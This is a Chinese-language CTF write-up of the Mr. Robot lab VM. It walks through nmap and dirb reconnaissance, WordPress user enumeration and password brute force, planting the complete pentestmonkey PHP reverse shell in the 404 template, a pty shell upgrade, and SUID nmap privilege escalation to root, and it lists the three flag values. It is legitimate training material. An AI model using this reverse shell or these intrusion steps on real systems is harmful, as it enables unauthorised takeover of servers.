Mr.robot靶机记录
2022-05-19 13:42:16 #WirteUp

Mr.robot 靶机记录

主机发现 内网其他主机省略

使用arp-scan 扫描发现主机指定网卡en0

sudo arp-scan --interface=eth0 -l

1
xxx.xxx.xxx.xxx	00:0c:29:47:12:82	VMware, Inc.

nmap查看相关信息

sudo nmap -p- xxx.xxx.xxx.xxx -sV -vv -O 

1
2
3
4
5
6
7
PORT    STATE  SERVICE  REASON         VERSION
22/tcp  closed ssh      reset ttl 64
80/tcp  open   http     syn-ack ttl 64 Apache httpd
443/tcp open   ssl/http syn-ack ttl 64 Apache httpd

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11

访问80端口

发现该网站挺炫酷的
尝试扫描目录 使用kali自带dirb

dirb http://xxx.xxx.xxx.xxx/

1
http://xxx.xxx.xxx.xxx/0/

发现该该网站使用WordPress 4.3.28

1
http://xxx.xxx.xxx.xxx/robots.txt (CODE:200|SIZE:41)
1
2
3
User-agent: *
fsocity.dic
key-1-of-3.txt

wget http://xxx.xxx.xxx.xxx/fsocity.dic

下载下来发现可能是密码字典
简单查看发现有很多重复字段

wc -l fsocity.dic

1
858160 fsocity.dic

尝试去重,生成new.dic

cat fsocity.dic|sort|uniq > new.dic

查看new.dic行数发现少了许多

wc -l new.dic 

1
11451 new.dic

信息搜集成果总结

1
2
3
4
5
6
已知开放端口80,443
已知使用cms为WordPress4.3.28
获取到类似字典文件并去重new.dic
获取到key-1-of-3.txt 页面
后台登录地址
http://xxx.xxx.xxx.xxx/wp-login.php

key1

访问key-1-of-3.txt页面发现flag1

1
2
key1:
073403c8a58a1f80d943455fb30724b9

尝试爆破后台密码

经过尝试发现后台登录页面输入用户名及密码会返回用户名错误

1
Error: Invalid username.

猜测可能若用户名正确回返回密码错误,尝试爆破用户名

经过爆破尝试用户名,发现猜测正确获得三个用户名

1
2
3
elliot
ELLIOT
Elliot

进一步尝试使用这三个用户名进行爆破后台密码,获得3个同样的密码

1
2
3
elliot  ER28-0652
ELLIOT  ER28-0652
Elliot  ER28-0652

反弹shell拿下控制权

随便找个页面上传php反弹shell
在这里修改404页面上传shell
并且使用kali监听19999端口

nc -lvvp 19999

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149

  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = 'xxx.xxx.xxx.xxx';  // You have changed this
  $port = 19999;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    
    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    
    if ($pid) {
      exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }

    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }

  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }

  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }

  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }

  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    if (!$daemon) {
      print "$string
";
    }
  }

  ?>

使用浏览器访问http://xxx.xxx.xxx.xxx/0/404.php成功反弹shell

但现在没有tty的shell,尝试用python生成一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

成功获得交互式shell

1
2
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$

提权

尝试提权find / -user root -perm /4000 2>/dev/null

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
find / -user root -perm /4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

发现有nmap可以利用 尝试使用nmap提权

1
2
3
4
5
6
7
8
9
daemon@linux:/$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
root

提权成功使用find命令查找出key1,key2,key3

1
2
3
4
5
6
7
8
# find / -name "*key*.txt"
find / -name "*key*.txt"
/usr/share/perl/5.18.2/Unicode/Collate/keys.txt
/usr/share/perl/5.18.2/Unicode/Collate/allkeys.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/root/key-3-of-3.txt
/opt/bitnami/apps/wordpress/htdocs/key-1-of-3.txt
/home/robot/key-2-of-3.txt

查看key

1
2
3
4
5
#cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

#cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Sum-up

扫描端口发现80,443

扫描目录发现robots.txt>fsocity.dic去重>new.dic

访问发现WordPress后台登录可以遍历用户名是否正确并且通过new.dic爆破用户名及密码

使用Elliot,ER28-0652登录后台上传shell反弹shell到攻击机

python生成tty shell

SUID查找可提权方式(nmap提权)>root用户为所欲为

key1:073403c8a58a1f80d943455fb30724b9

key2:822c73956184f694993bede3eb39f959

key3:04787ddef27c3dee1ee161b21670b4e4

上一页
2022-05-19 13:42:16 #WirteUp
下一页